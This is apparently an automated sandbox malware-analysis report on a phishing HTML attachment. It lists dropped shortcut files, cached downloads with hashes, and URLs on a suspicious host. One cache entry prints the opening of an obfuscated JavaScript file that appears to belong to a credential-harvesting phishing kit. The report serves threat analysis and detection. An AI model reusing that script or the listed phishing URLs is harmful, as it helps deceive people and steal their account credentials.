104.17.2.184	unknown	United States		13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.16

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1428623
Start date and time:	2024-04-19 10:40:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Analysis stop reason:	Timeout
Sample name:	Play_NewMessage_17April2024_Audio.htm
Detection:	MAL
Classification:	mal60.phis.evad.winHTM@18/35@18/156
Cookbook Comments:	Found application associated with file extension: .htm

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.9.94, 64.233.185.100, 64.233.185.101, 64.233.185.113, 64.233.185.139, 64.233.185.138, 64.233.185.102, 74.125.136.84, 34.104.35.123
Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 19 07:40:39 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2673
Entropy (8bit):	3.9850502471632163
Encrypted:	false
SSDEEP:
MD5:	A725AB025BD8B331F7F89A2C4EBE4E09
SHA1:	9C6A98591CC13841061524406EC40D576AF46820
SHA-256:	CFC300AE50E79B2F62F9ECC11C830E52A32DAD3E2AE492F2120FD77B3723C30A
SHA-512:	4648F14F9941B52859E37BC3C8772402D2AF19CBE356B42C44B7A4B6D75D799994AFBC530B289295AC387793CF1F3A3ACBEAB3B7943EE4467C9A6310260232DA
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....S..A5...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.E....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.E....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.E....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.E..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 19 07:40:39 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2675
Entropy (8bit):	4.0018876005420205
Encrypted:	false
SSDEEP:
MD5:	3CC20A5AC707A658F74BE5C828299FD9
SHA1:	EF9133127CF6E43799C701552FB110EF097E227E
SHA-256:	2635D09DC01A172CF37540750D031AE0C373823EB011AF19E80F3AE1786CD98A
SHA-512:	BB818E2A55457F3C771F65D3A222DEE87730B8908FD726B03DCDA13BB915AD5FACB833C44E6887B7A3BB85F6C98BFB82A51CA3360534984CEC5E32695B6F3F5E
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....W.{A5...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.E....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.E....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.E....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.E..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2689
Entropy (8bit):	4.010627330865566
Encrypted:	false
SSDEEP:
MD5:	6EE9DB9B9AA875DC5FBEB0FEF929AEC9
SHA1:	BA80DDAC95FAC29E3C7E2E319014C734C1890039
SHA-256:	A06AB8B6FF0C728625AF712864A6B25BB6D7EFF689317273B8273819F0CA86EA
SHA-512:	1F032EB68635D6D74E0FAB27E397C682783A07D051FEF49E2C0E687DA2E28B402331F6E4CCFB820F48EC0C0D164751F3248799ACA2819713591FD142F6FEF7CD
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.E....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.E....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.E....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.E..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 19 07:40:39 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	4.0006386924259205
Encrypted:	false
SSDEEP:
MD5:	F377B133FD872B16D5B8F2667269D651
SHA1:	6A6B30D1A43E40A6342C665D015E9CEE6B4FC134
SHA-256:	160A58638ACC37898B627F1987B21023F19CDED55A377EB20F750EAD7528E529
SHA-512:	637D18B89BB6CE72AFD6ED34CC779C5923793B8DBB54B3CA7E8317F5806A2F036A389ED86CC220457B46BD431DFF8FD16FDD8DE48CB51B15C7F3CDCA704D360F
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.....>vA5...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.E....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.E....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.E....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.E..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 19 07:40:39 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9895757677629833
Encrypted:	false
SSDEEP:
MD5:	B29D5C8C2EC0CD34333E955758EBBD48
SHA1:	BF18BAD855BD6B452D7060BB25D4A67D6A65DC0D
SHA-256:	29ABE1A73D2D16B7E230F78C12E826661D9C961008ABD90DD4459A539572AE2A
SHA-512:	3D7D2048EF688ABB20E2BF2E05CE7A2FA593732ACD789ED0BA79CA426563C4A8F7C75F4A9ADF3072A97381FA282DDE655441021AAFB0B969E273EEC6085DB89A
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,.......A5...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.E....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.E....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.E....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.E..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 19 07:40:38 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9954918080390636
Encrypted:	false
SSDEEP:
MD5:	24B460A44D3360BCB0906D427405DC14
SHA1:	906D4B2B05E73249FEB3F59938DFA8E5EE9282E7
SHA-256:	5889BBBDB7DCB5EE9636D18404260601D6D6654A766C371ECBE76B8A012888A6
SHA-512:	9FE473B758111E05B5D0C32A3A63DBCA41C9292BC9121E7BB987ABBF15F0ED72AF8A9EE0949244C2F1CD9D17C5E4171D07D6156D7D6F5634579BA1368E16B869
Malicious:	false
Reputation:	unknown
Preview:	L..................F.@.. ...$+.,....j>mA5...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.E....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.E....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.E....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.E..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i....................C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Chrome Cache Entry: 102

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 506 x 303, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	29796
Entropy (8bit):	7.980058333789969
Encrypted:	false
SSDEEP:
MD5:	210433A8774859368F3A7B86D125A2A7
SHA1:	408BACDDC39F12CAD285579C102FE4A629862D88
SHA-256:	9C6ADDFC339CE1C1D262290AB4CC2DE8D38D4B54B11A8E85AFD44FBB0ACC2561
SHA-512:	6CBF6492BBA0734ECE1B595743B7A251D3C98425A36D5BF87EBFAD17BE979A23ADEE556FB074EF6D284052F6412ACEDA4E179FB7DFA0BA1103610CC01113A1A3
Malicious:	false
Reputation:	unknown
URL:	https://p9j0fds.x5kls.com/qrGXjoYkmQFZJW48TvRNYaw5XeGctLEBAByiBuuvrWPivTe4Poxv6LUV3kPTaknrDu2Nxvz9YYNwHcd234
Preview:	.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z#..0......D.....FV.w..,.T..............X.\|..\|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...\|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.

Chrome Cache Entry: 104

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	7390
Entropy (8bit):	4.02755241095864
Encrypted:	false
SSDEEP:
MD5:	B59C16CA9BF156438A8A96D45E33DB64
SHA1:	4E51B7D3477414B220F688ADABD76D3AE6472EE3
SHA-256:	A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
SHA-512:	2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
Malicious:	false
Reputation:	unknown
Preview:	<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14

Chrome Cache Entry: 105

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
Category:	downloaded
Size (bytes):	28584
Entropy (8bit):	7.992563951996154
Encrypted:	true
SSDEEP:
MD5:	17081510F3A6F2F619EC8C6F244523C7
SHA1:	87F34B2A1532C50F2A424C345D03FE028DB35635
SHA-256:	2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
SHA-512:	E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
Malicious:	false
Reputation:	unknown
URL:	https://p9j0fds.x5kls.com/78mQIQrxyGOz45lXT7GGytuv58
Preview:	wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww....eU..S.........0..S.s..,....\.e..F.&....oUR.}Q.C..2.TD....5..#..h.H.2.\|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#...#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......LCE..Nf~.N.eJ.iXnXC.&....t.U..Nr.@..lZ.... .X..

Chrome Cache Entry: 107

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
Category:	downloaded
Size (bytes):	109964
Entropy (8bit):	5.201196778775329
Encrypted:	false
SSDEEP:
MD5:	78A5500114640D663460BCBB33E694EB
SHA1:	C72B1B93C8BC2DDBD77BA3C042A8ED415B6B8E26
SHA-256:	E97FE9DB7CA567DA1F9F5A3B87B669146ADDF1983392C32FDA68C4D667A3CA22
SHA-512:	AAEB2961C7F93B8DF2600068C48706920D0DA1E1C2C925FBDFBED10E33120B05C9722ECBB63C6B3DD534D664CFB5F183CCF850591BBB78DAA89E0A3F637A450C
Malicious:	false
Reputation:	unknown
URL:	https://p9j0fds.x5kls.com/34iLTLWHWnVNOzBweAXSQ1EoRFSklJ0PWMyfD67110
Preview:	const _0x3c0b69=_0x40bd;(function(_0x1ffa3e,_0x743a4f){const _0x1f38a8=_0x40bd,_0x2d88b6=_0x1ffa3e();while(!![]){try{const _0x461944=-parseInt(_0x1f38a8(0x20b))/0x1+parseInt(_0x1f38a8(0x319))/0x2(parseInt(_0x1f38a8(0x2d0))/0x3)+parseInt(_0x1f38a8(0x2c7))/0x4(parseInt(_0x1f38a8(0x281))/0x5)+parseInt(_0x1f38a8(0x21b))/0x6+-parseInt(_0x1f38a8(0x34b))/0x7+parseInt(_0x1f38a8(0x1d9))/0x8+parseInt(_0x1f38a8(0x245))/0x9*(-parseInt(_0x1f38a8(0x2ac))/0xa);if(_0x461944===_0x743a4f)break;else _0x2d88b6['push'](_0x2d88b6['shift']());}catch(_0xf1881c){_0x2d88b6['push'](_0x2d88b6['shift']());}}}(_0x4624,0xa135c));var webnotfound=![],otherweburl='',interacted=0x0,multipleaccountsback=0x0;!document[_0x3c0b69(0x2ff)](_0x3c0b69(0x332))[_0x3c0b69(0x2df)][_0x3c0b69(0x2e1)](_0x3c0b69(0x1e7))&&(view=_0x3c0b69(0x2c8));document['getElementById'](_0x3c0b69(0x2a8))&&!document[_0x3c0b69(0x2ff)](_0x3c0b69(0x2a8))['classList'][_0x3c0b69(0x2e1)](_0x3c0b69(0x1e7))&&(view='uname_pdf');document[_0x3c0b69(0x326)](_0x3

Chrome Cache Entry: 108

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1400
Entropy (8bit):	7.808470583085035
Encrypted:	false
SSDEEP:
MD5:	333EE830E5AB72C41DD9126A27B4D878
SHA1:	12D8D66EBB3076F3D6069E133C3212F97C8774E1
SHA-256:	8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
SHA-512:	3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.\|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A..U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5\|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `......`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&\|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,\|Q...u.-.._....m.1...\|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9.(9..U...x$#.C...Nm...p.....J...

Chrome Cache Entry: 109

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 43596, version 1.0
Category:	downloaded
Size (bytes):	43596
Entropy (8bit):	7.9952701440723475
Encrypted:	true
SSDEEP:
MD5:	2A05E9E5572ABC320B2B7EA38A70DCC1
SHA1:	D5FA2A856D5632C2469E42436159375117EF3C35
SHA-256:	3EFCB941AADDAF4AEA08DAB3FB97D3E904AA1B83264E64B4D5BDA53BC7C798EC
SHA-512:	785AB5585B8A9ED762D70578BF13A6A69342441E679698FD946E3616EF5688485F099F3DC472975EF5D9248AFAAD6DA6779813B88AA1DB60ABE2CC065F47EB5F
Malicious:	false
Reputation:	unknown
URL:	https://p9j0fds.x5kls.com/90S9nNnU3EKDPrf0eR1612oLdtihrglab80
Preview:	wOF2.......L.......P..............................U...z...?HVAR.;?MVARF.`?STAT...H/L.....@..P..>.0....6.$..x. .....{[.q....Rl....t..~v....(....T.t.;..n'..v=....?...l].xI...m."..?hNX.,...8.;G...m,}.h.>(=[...m/.>....8&f..&.......].u...&.VD..].<..yR.eb<,x......)..c..t...k...9..o.T..R9..kq..TR%U..v....r._......D...f..=qH...8.<...x..(V.I.h.L3#]8...-.z.........3.9V..........u.........x.....S_...\1...&6...j^...c;()m.J.....>....xz..Y...\|.7......!.jw...,.L.;N.......n......].....8].R..d.....`.R.B..#..,...1R.UJD..b.`.0<....FA=..{.....`....c...R..Uy..J.k.".j..N.{w..UT<.8T66...H,...FH.GS.G.]......?.T.!4..8...B...l.p@.......t.o...v...b.g..?..m..!.%.....x..MC1M...........k...})..+N.....Q_yS.X.11a....&`..'".xZ..=b^...iD...} .. ..b...}DIvu.q....k.4.....@.....P..j..)..'.L......b..RQjII..Qk.T.l._wO..$....!c..%.{.._N..E@....A...?...aW.y.gf.g.&E... ~.x.b....b...~......f/.....G....J.6.y.....zE@T.a.0^Ul......S:..,..}..B.R..Rt~.v...L:`4.IKA..V...x&@...h.7.P......

Chrome Cache Entry: 110

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1437), with CRLF line terminators
Category:	downloaded
Size (bytes):	38221
Entropy (8bit):	5.115226983536052
Encrypted:	false
SSDEEP:
MD5:	FBE2FCF4596B299453C91B7231BA7427
SHA1:	743291EE60A551E043529AFDC9E3FBE72D70E776
SHA-256:	2DE22B4CDEDCBEB9CD5F63EA7A0DF8F77D0EF9086D200B052BFA9EE949DEED40
SHA-512:	15CA09CD5754927D77B2CC9B74356585C5A1DD934ECF25B613F47964236A739DA8BE389999DE1AEEE7BDF8FA12FCBB07EEFF49E0EA80BA87AC786606DE74774F
Malicious:	false
Reputation:	unknown
URL:	https://p9j0fds.x5kls.com/ab6Svrl8mpq6TEgh29
Preview:	@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/web8/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 400;src: url('/web8/assets/fonts/GDSherpa-regular.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-regular.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 999;src: url('/web8/assets/fonts/GDSherpa-vf.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 900;src: url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sage';font-weight: 700;src: url('/web8/ass

Chrome Cache Entry: 111

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	70712
Entropy (8bit):	6.94130504124589
Encrypted:	false
SSDEEP:
MD5:	F70FF06D19498D80B130EC78176FD3FF
SHA1:	9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
SHA-256:	DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
SHA-512:	543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
Malicious:	false
Reputation:	unknown
